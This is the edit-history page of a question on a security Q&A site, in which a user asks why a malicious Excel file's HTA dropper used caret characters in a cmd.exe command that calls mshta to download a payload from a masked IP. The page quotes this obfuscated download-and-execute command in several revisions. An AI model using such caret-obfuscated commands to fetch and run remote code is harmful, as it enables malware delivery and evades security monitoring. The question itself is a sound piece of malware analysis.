Skip to main content
Information Security

Return to Question

deleted 75 characters in body; edited tags; edited title
Source Link
schroeder
schroeder
  • 134.3k
  • 55
  • 310
  • 357

(HTA language) malware Malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

I found a malicious excelExcel file that was using an embedded HTA program as its dropper to download a powershell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the "^"^ character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was :

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the commandline? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Thanks,

QOHEN

NOTE: I used "x's" to hide the IP address....not part of the syntax

(HTA language) malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

I found a malicious excel file that was using an embedded HTA program as its dropper to download a powershell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the "^" character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was :

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the commandline? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Thanks,

QOHEN

NOTE: I used "x's" to hide the IP address....not part of the syntax

Malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

I found a malicious Excel file that was using an embedded HTA program as its dropper to download a powershell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the ^ character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was :

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the commandline? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Source Link
QOHEN
QOHEN
  • 1

(HTA language) malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

I found a malicious excel file that was using an embedded HTA program as its dropper to download a powershell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the "^" character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was :

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the commandline? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Thanks,

QOHEN

NOTE: I used "x's" to hide the IP address....not part of the syntax